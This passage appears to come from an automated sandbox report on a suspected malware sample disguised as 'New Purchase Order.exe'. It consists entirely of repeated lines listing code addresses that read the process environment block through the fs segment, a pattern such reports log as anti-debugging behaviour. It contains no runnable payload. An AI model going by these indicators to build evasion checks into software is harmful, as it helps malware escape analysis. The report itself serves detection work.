                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F0274 mov eax, dword ptr fs:[00000030h]3_2_018F0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F0274 mov eax, dword ptr fs:[00000030h]3_2_018F0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F0274 mov eax, dword ptr fs:[00000030h]3_2_018F0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F0274 mov eax, dword ptr fs:[00000030h]3_2_018F0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F0274 mov eax, dword ptr fs:[00000030h]3_2_018F0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F0274 mov eax, dword ptr fs:[00000030h]3_2_018F0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F0274 mov eax, dword ptr fs:[00000030h]3_2_018F0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F0274 mov eax, dword ptr fs:[00000030h]3_2_018F0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F0274 mov eax, dword ptr fs:[00000030h]3_2_018F0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F0274 mov eax, dword ptr fs:[00000030h]3_2_018F0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F0274 mov eax, dword ptr fs:[00000030h]3_2_018F0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F0274 mov eax, dword ptr fs:[00000030h]3_2_018F0274
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01842582 mov eax, dword ptr fs:[00000030h]3_2_01842582
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01842582 mov ecx, dword ptr fs:[00000030h]3_2_01842582
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01874588 mov eax, dword ptr fs:[00000030h]3_2_01874588
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E59C mov eax, dword ptr fs:[00000030h]3_2_0187E59C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C05A7 mov eax, dword ptr fs:[00000030h]3_2_018C05A7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C05A7 mov eax, dword ptr fs:[00000030h]3_2_018C05A7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C05A7 mov eax, dword ptr fs:[00000030h]3_2_018C05A7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018645B1 mov eax, dword ptr fs:[00000030h]3_2_018645B1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018645B1 mov eax, dword ptr fs:[00000030h]3_2_018645B1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E5CF mov eax, dword ptr fs:[00000030h]3_2_0187E5CF
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E5CF mov eax, dword ptr fs:[00000030h]3_2_0187E5CF
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018465D0 mov eax, dword ptr fs:[00000030h]3_2_018465D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187A5D0 mov eax, dword ptr fs:[00000030h]3_2_0187A5D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187A5D0 mov eax, dword ptr fs:[00000030h]3_2_0187A5D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E5E7 mov eax, dword ptr fs:[00000030h]3_2_0186E5E7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E5E7 mov eax, dword ptr fs:[00000030h]3_2_0186E5E7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E5E7 mov eax, dword ptr fs:[00000030h]3_2_0186E5E7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E5E7 mov eax, dword ptr fs:[00000030h]3_2_0186E5E7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E5E7 mov eax, dword ptr fs:[00000030h]3_2_0186E5E7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E5E7 mov eax, dword ptr fs:[00000030h]3_2_0186E5E7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E5E7 mov eax, dword ptr fs:[00000030h]3_2_0186E5E7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E5E7 mov eax, dword ptr fs:[00000030h]3_2_0186E5E7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018425E0 mov eax, dword ptr fs:[00000030h]3_2_018425E0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187C5ED mov eax, dword ptr fs:[00000030h]3_2_0187C5ED
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187C5ED mov eax, dword ptr fs:[00000030h]3_2_0187C5ED
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D6500 mov eax, dword ptr fs:[00000030h]3_2_018D6500
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01914500 mov eax, dword ptr fs:[00000030h]3_2_01914500
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01914500 mov eax, dword ptr fs:[00000030h]3_2_01914500
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01914500 mov eax, dword ptr fs:[00000030h]3_2_01914500
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01914500 mov eax, dword ptr fs:[00000030h]3_2_01914500
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01914500 mov eax, dword ptr fs:[00000030h]3_2_01914500
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01914500 mov eax, dword ptr fs:[00000030h]3_2_01914500
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01914500 mov eax, dword ptr fs:[00000030h]3_2_01914500
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850535 mov eax, dword ptr fs:[00000030h]3_2_01850535
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850535 mov eax, dword ptr fs:[00000030h]3_2_01850535
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850535 mov eax, dword ptr fs:[00000030h]3_2_01850535
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850535 mov eax, dword ptr fs:[00000030h]3_2_01850535
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850535 mov eax, dword ptr fs:[00000030h]3_2_01850535
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850535 mov eax, dword ptr fs:[00000030h]3_2_01850535
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E53E mov eax, dword ptr fs:[00000030h]3_2_0186E53E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E53E mov eax, dword ptr fs:[00000030h]3_2_0186E53E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E53E mov eax, dword ptr fs:[00000030h]3_2_0186E53E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E53E mov eax, dword ptr fs:[00000030h]3_2_0186E53E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186E53E mov eax, dword ptr fs:[00000030h]3_2_0186E53E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01848550 mov eax, dword ptr fs:[00000030h]3_2_01848550
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01848550 mov eax, dword ptr fs:[00000030h]3_2_01848550
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187656A mov eax, dword ptr fs:[00000030h]3_2_0187656A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187656A mov eax, dword ptr fs:[00000030h]3_2_0187656A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187656A mov eax, dword ptr fs:[00000030h]3_2_0187656A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018FA49A mov eax, dword ptr fs:[00000030h]3_2_018FA49A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018464AB mov eax, dword ptr fs:[00000030h]3_2_018464AB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018744B0 mov ecx, dword ptr fs:[00000030h]3_2_018744B0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018CA4B0 mov eax, dword ptr fs:[00000030h]3_2_018CA4B0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018404E5 mov ecx, dword ptr fs:[00000030h]3_2_018404E5
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01878402 mov eax, dword ptr fs:[00000030h]3_2_01878402
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01878402 mov eax, dword ptr fs:[00000030h]3_2_01878402
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01878402 mov eax, dword ptr fs:[00000030h]3_2_01878402
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183E420 mov eax, dword ptr fs:[00000030h]3_2_0183E420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183E420 mov eax, dword ptr fs:[00000030h]3_2_0183E420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183E420 mov eax, dword ptr fs:[00000030h]3_2_0183E420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183C427 mov eax, dword ptr fs:[00000030h]3_2_0183C427
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C6420 mov eax, dword ptr fs:[00000030h]3_2_018C6420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C6420 mov eax, dword ptr fs:[00000030h]3_2_018C6420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C6420 mov eax, dword ptr fs:[00000030h]3_2_018C6420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C6420 mov eax, dword ptr fs:[00000030h]3_2_018C6420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C6420 mov eax, dword ptr fs:[00000030h]3_2_018C6420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C6420 mov eax, dword ptr fs:[00000030h]3_2_018C6420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C6420 mov eax, dword ptr fs:[00000030h]3_2_018C6420
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187A430 mov eax, dword ptr fs:[00000030h]3_2_0187A430
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E443 mov eax, dword ptr fs:[00000030h]3_2_0187E443
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E443 mov eax, dword ptr fs:[00000030h]3_2_0187E443
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E443 mov eax, dword ptr fs:[00000030h]3_2_0187E443
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E443 mov eax, dword ptr fs:[00000030h]3_2_0187E443
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E443 mov eax, dword ptr fs:[00000030h]3_2_0187E443
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E443 mov eax, dword ptr fs:[00000030h]3_2_0187E443
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E443 mov eax, dword ptr fs:[00000030h]3_2_0187E443
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187E443 mov eax, dword ptr fs:[00000030h]3_2_0187E443
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018FA456 mov eax, dword ptr fs:[00000030h]3_2_018FA456
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186245A mov eax, dword ptr fs:[00000030h]3_2_0186245A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0183645D mov eax, dword ptr fs:[00000030h]3_2_0183645D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018CC460 mov ecx, dword ptr fs:[00000030h]3_2_018CC460
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186A470 mov eax, dword ptr fs:[00000030h]3_2_0186A470
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186A470 mov eax, dword ptr fs:[00000030h]3_2_0186A470
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0186A470 mov eax, dword ptr fs:[00000030h]3_2_0186A470
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E678E mov eax, dword ptr fs:[00000030h]3_2_018E678E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018407AF mov eax, dword ptr fs:[00000030h]3_2_018407AF
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018F47A0 mov eax, dword ptr fs:[00000030h]3_2_018F47A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184C7C0 mov eax, dword ptr fs:[00000030h]3_2_0184C7C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C07C3 mov eax, dword ptr fs:[00000030h]3_2_018C07C3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018627ED mov eax, dword ptr fs:[00000030h]3_2_018627ED
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018627ED mov eax, dword ptr fs:[00000030h]3_2_018627ED
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018627ED mov eax, dword ptr fs:[00000030h]3_2_018627ED
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018CE7E1 mov eax, dword ptr fs:[00000030h]3_2_018CE7E1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018447FB mov eax, dword ptr fs:[00000030h]3_2_018447FB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018447FB mov eax, dword ptr fs:[00000030h]3_2_018447FB
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187C700 mov eax, dword ptr fs:[00000030h]3_2_0187C700
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01840710 mov eax, dword ptr fs:[00000030h]3_2_01840710
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01870710 mov eax, dword ptr fs:[00000030h]3_2_01870710
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187C720 mov eax, dword ptr fs:[00000030h]3_2_0187C720
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187C720 mov eax, dword ptr fs:[00000030h]3_2_0187C720
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018BC730 mov eax, dword ptr fs:[00000030h]3_2_018BC730
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187273C mov eax, dword ptr fs:[00000030h]3_2_0187273C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187273C mov ecx, dword ptr fs:[00000030h]3_2_0187273C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187273C mov eax, dword ptr fs:[00000030h]3_2_0187273C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187674D mov esi, dword ptr fs:[00000030h]3_2_0187674D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187674D mov eax, dword ptr fs:[00000030h]3_2_0187674D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187674D mov eax, dword ptr fs:[00000030h]3_2_0187674D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018CE75D mov eax, dword ptr fs:[00000030h]3_2_018CE75D
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01840750 mov eax, dword ptr fs:[00000030h]3_2_01840750
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882750 mov eax, dword ptr fs:[00000030h]3_2_01882750
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882750 mov eax, dword ptr fs:[00000030h]3_2_01882750
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C4755 mov eax, dword ptr fs:[00000030h]3_2_018C4755
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01848770 mov eax, dword ptr fs:[00000030h]3_2_01848770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850770 mov eax, dword ptr fs:[00000030h]3_2_01850770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850770 mov eax, dword ptr fs:[00000030h]3_2_01850770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850770 mov eax, dword ptr fs:[00000030h]3_2_01850770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850770 mov eax, dword ptr fs:[00000030h]3_2_01850770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850770 mov eax, dword ptr fs:[00000030h]3_2_01850770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850770 mov eax, dword ptr fs:[00000030h]3_2_01850770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850770 mov eax, dword ptr fs:[00000030h]3_2_01850770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850770 mov eax, dword ptr fs:[00000030h]3_2_01850770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850770 mov eax, dword ptr fs:[00000030h]3_2_01850770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850770 mov eax, dword ptr fs:[00000030h]3_2_01850770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850770 mov eax, dword ptr fs:[00000030h]3_2_01850770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01850770 mov eax, dword ptr fs:[00000030h]3_2_01850770
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01844690 mov eax, dword ptr fs:[00000030h]3_2_01844690
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01844690 mov eax, dword ptr fs:[00000030h]3_2_01844690
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187C6A6 mov eax, dword ptr fs:[00000030h]3_2_0187C6A6
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018766B0 mov eax, dword ptr fs:[00000030h]3_2_018766B0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187A6C7 mov ebx, dword ptr fs:[00000030h]3_2_0187A6C7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187A6C7 mov eax, dword ptr fs:[00000030h]3_2_0187A6C7
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018BE6F2 mov eax, dword ptr fs:[00000030h]3_2_018BE6F2
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018BE6F2 mov eax, dword ptr fs:[00000030h]3_2_018BE6F2
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018BE6F2 mov eax, dword ptr fs:[00000030h]3_2_018BE6F2
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018BE6F2 mov eax, dword ptr fs:[00000030h]3_2_018BE6F2
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C06F1 mov eax, dword ptr fs:[00000030h]3_2_018C06F1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C06F1 mov eax, dword ptr fs:[00000030h]3_2_018C06F1
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018BE609 mov eax, dword ptr fs:[00000030h]3_2_018BE609
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185260B mov eax, dword ptr fs:[00000030h]3_2_0185260B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185260B mov eax, dword ptr fs:[00000030h]3_2_0185260B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185260B mov eax, dword ptr fs:[00000030h]3_2_0185260B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185260B mov eax, dword ptr fs:[00000030h]3_2_0185260B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185260B mov eax, dword ptr fs:[00000030h]3_2_0185260B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185260B mov eax, dword ptr fs:[00000030h]3_2_0185260B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185260B mov eax, dword ptr fs:[00000030h]3_2_0185260B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01882619 mov eax, dword ptr fs:[00000030h]3_2_01882619
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185E627 mov eax, dword ptr fs:[00000030h]3_2_0185E627
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01876620 mov eax, dword ptr fs:[00000030h]3_2_01876620
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01878620 mov eax, dword ptr fs:[00000030h]3_2_01878620
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184262C mov eax, dword ptr fs:[00000030h]3_2_0184262C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0185C640 mov eax, dword ptr fs:[00000030h]3_2_0185C640
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187A660 mov eax, dword ptr fs:[00000030h]3_2_0187A660
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0187A660 mov eax, dword ptr fs:[00000030h]3_2_0187A660
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01872674 mov eax, dword ptr fs:[00000030h]3_2_01872674
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0190866E mov eax, dword ptr fs:[00000030h]3_2_0190866E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0190866E mov eax, dword ptr fs:[00000030h]3_2_0190866E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018529A0 mov eax, dword ptr fs:[00000030h]3_2_018529A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018529A0 mov eax, dword ptr fs:[00000030h]3_2_018529A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018529A0 mov eax, dword ptr fs:[00000030h]3_2_018529A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018529A0 mov eax, dword ptr fs:[00000030h]3_2_018529A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018529A0 mov eax, dword ptr fs:[00000030h]3_2_018529A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018529A0 mov eax, dword ptr fs:[00000030h]3_2_018529A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018529A0 mov eax, dword ptr fs:[00000030h]3_2_018529A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018529A0 mov eax, dword ptr fs:[00000030h]3_2_018529A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018529A0 mov eax, dword ptr fs:[00000030h]3_2_018529A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018529A0 mov eax, dword ptr fs:[00000030h]3_2_018529A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018529A0 mov eax, dword ptr fs:[00000030h]3_2_018529A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018529A0 mov eax, dword ptr fs:[00000030h]3_2_018529A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018529A0 mov eax, dword ptr fs:[00000030h]3_2_018529A0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018409AD mov eax, dword ptr fs:[00000030h]3_2_018409AD
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018409AD mov eax, dword ptr fs:[00000030h]3_2_018409AD
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C89B3 mov esi, dword ptr fs:[00000030h]3_2_018C89B3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C89B3 mov eax, dword ptr fs:[00000030h]3_2_018C89B3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C89B3 mov eax, dword ptr fs:[00000030h]3_2_018C89B3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0190A9D3 mov eax, dword ptr fs:[00000030h]3_2_0190A9D3
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D69C0 mov eax, dword ptr fs:[00000030h]3_2_018D69C0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A9D0 mov eax, dword ptr fs:[00000030h]3_2_0184A9D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A9D0 mov eax, dword ptr fs:[00000030h]3_2_0184A9D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A9D0 mov eax, dword ptr fs:[00000030h]3_2_0184A9D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A9D0 mov eax, dword ptr fs:[00000030h]3_2_0184A9D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A9D0 mov eax, dword ptr fs:[00000030h]3_2_0184A9D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0184A9D0 mov eax, dword ptr fs:[00000030h]3_2_0184A9D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018749D0 mov eax, dword ptr fs:[00000030h]3_2_018749D0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018CE9E0 mov eax, dword ptr fs:[00000030h]3_2_018CE9E0
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018729F9 mov eax, dword ptr fs:[00000030h]3_2_018729F9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018729F9 mov eax, dword ptr fs:[00000030h]3_2_018729F9
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018BE908 mov eax, dword ptr fs:[00000030h]3_2_018BE908
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018BE908 mov eax, dword ptr fs:[00000030h]3_2_018BE908
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01838918 mov eax, dword ptr fs:[00000030h]3_2_01838918
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01838918 mov eax, dword ptr fs:[00000030h]3_2_01838918
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018CC912 mov eax, dword ptr fs:[00000030h]3_2_018CC912
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C892A mov eax, dword ptr fs:[00000030h]3_2_018C892A
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018D892B mov eax, dword ptr fs:[00000030h]3_2_018D892B
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018C0946 mov eax, dword ptr fs:[00000030h]3_2_018C0946
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01914940 mov eax, dword ptr fs:[00000030h]3_2_01914940
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01866962 mov eax, dword ptr fs:[00000030h]3_2_01866962
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01866962 mov eax, dword ptr fs:[00000030h]3_2_01866962
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01866962 mov eax, dword ptr fs:[00000030h]3_2_01866962
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0188096E mov eax, dword ptr fs:[00000030h]3_2_0188096E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0188096E mov edx, dword ptr fs:[00000030h]3_2_0188096E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_0188096E mov eax, dword ptr fs:[00000030h]3_2_0188096E
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018CC97C mov eax, dword ptr fs:[00000030h]3_2_018CC97C
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E4978 mov eax, dword ptr fs:[00000030h]3_2_018E4978
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_018E4978 mov eax, dword ptr fs:[00000030h]3_2_018E4978
                Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 3_2_01840887 mov eax, dword ptr fs:[00000030h]3_2_01840887
